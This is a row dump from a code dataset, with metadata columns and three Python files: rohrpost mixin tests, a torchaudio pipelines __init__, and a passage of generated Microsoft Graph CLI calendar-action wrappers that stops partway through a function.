hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
059a79f4cb500453c638389abdb21db87068390d | 13,045 | py | Python | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 8 | 2017-01-02T08:41:36.000Z | 2019-11-06T06:19:58.000Z | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 6 | 2017-04-28T12:23:27.000Z | 2018-09-03T14:56:46.000Z | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 1 | 2018-08-29T14:47:53.000Z | 2018-08-29T14:47:53.000Z | import json
from collections import defaultdict
LOGGED_DATA = defaultdict(list)
def mocked_send_to_group(*, group_name, message):
LOGGED_DATA[group_name].append(json.loads(message))
def mocked_transaction_commit(func):
func()
def test_without_name(plain_obj, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 1
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
# update
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 2
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
# delete
plain_obj.delete()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 3
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["plainexamplemodel-1"] = []
def test_send_update_fields(plain_obj, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 1
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"updated_fields" not in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]
)
# update without fields
plain_obj.save(update_fields=[])
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 2
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"updated_fields" not in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]
)
# update with fields
plain_obj.save(update_fields=["something", "something_else"])
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 3
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"something_else"
in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["updated_fields"]
)
def test_with_attribute_name(obj_with_attr, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_attr.save()
assert len(LOGGED_DATA["attribute-example-1"]) == 1
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_attr.save()
assert len(LOGGED_DATA["attribute-example-1"]) == 2
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_attr.delete()
assert len(LOGGED_DATA["attribute-example-1"]) == 3
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["attribute-example-1"] = []
def test_with_method_name(obj_with_method, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_method.save()
assert len(LOGGED_DATA["method-example-1"]) == 1
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_method.save()
assert len(LOGGED_DATA["method-example-1"]) == 2
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_method.delete()
assert len(LOGGED_DATA["method-example-1"]) == 3
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["method-example-1"] = []
def test_with_method_and_attr(obj_with_method_and_attr, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_method_and_attr.save()
assert len(LOGGED_DATA["method-example-1"]) == 1
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_method_and_attr.save()
assert len(LOGGED_DATA["method-example-1"]) == 2
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_method_and_attr.delete()
assert len(LOGGED_DATA["method-example-1"]) == 3
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["method-example-1"] = []
def test_with_additional_data(obj_with_data, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_data.save()
assert len(LOGGED_DATA["modelwithdata-1"]) == 1
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
# update
obj_with_data.save()
assert len(LOGGED_DATA["modelwithdata-1"]) == 2
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
# delete
obj_with_data.delete()
assert len(LOGGED_DATA["modelwithdata-1"]) == 3
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
LOGGED_DATA["modelwithdata-1"] = []
def test_with_serializer(obj_with_serializer, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_serializer.save()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 1
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
# update
obj_with_serializer.save()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 2
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
# delete
obj_with_serializer.delete()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 3
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
LOGGED_DATA["modelwithserializer-1"] = []
def test_with_serializer_and_data(obj_with_serializer_and_data, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_serializer_and_data.save()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 1
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
# update
obj_with_serializer_and_data.save()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 2
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
# delete
obj_with_serializer_and_data.delete()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 3
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
LOGGED_DATA["modelwithserializeranddata-1"] = []
| 41.15142 | 88 | 0.664392 | 1,550 | 13,045 | 5.385161 | 0.04 | 0.147358 | 0.143764 | 0.060381 | 0.944531 | 0.930754 | 0.897688 | 0.889541 | 0.869294 | 0.864502 | 0 | 0.022828 | 0.150402 | 13,045 | 316 | 89 | 41.281646 | 0.730308 | 0.014872 | 0 | 0.65587 | 0 | 0 | 0.363013 | 0.113753 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.040486 | false | 0 | 0.008097 | 0 | 0.048583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
05b8402cd3b2795513d651754bfda2d75cf27fcc | 164 | py | Python | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | from .rnnt_pipeline import EMFORMER_RNNT_BASE_MUSTC, EMFORMER_RNNT_BASE_TEDLIUM3
__all__ = [
"EMFORMER_RNNT_BASE_MUSTC",
"EMFORMER_RNNT_BASE_TEDLIUM3",
]
| 20.5 | 80 | 0.804878 | 21 | 164 | 5.47619 | 0.428571 | 0.417391 | 0.556522 | 0.365217 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0 | 0 | 0 | 0.013986 | 0.128049 | 164 | 7 | 81 | 23.428571 | 0.79021 | 0 | 0 | 0 | 0 | 0 | 0.310976 | 0.310976 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
05cb7d1e7be86c508454be8e20d8bbac63b1ce91 | 350,881 | py | Python | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | 22 | 2022-03-29T22:54:37.000Z | 2022-03-29T22:55:27.000Z | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
def usersactions_userscalendarviewattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewcalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarviewinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarview_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_userscalendarview_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventsattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventscalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventsinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendareventsinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarevent_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_userscalendarevent_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendar_get_schedule(client,
user_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewattachment_create_upload_session(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewcalendar_get_schedule(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_decline(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_dismiss_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendargroupscalendarscalendarviewinstance_snooze_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
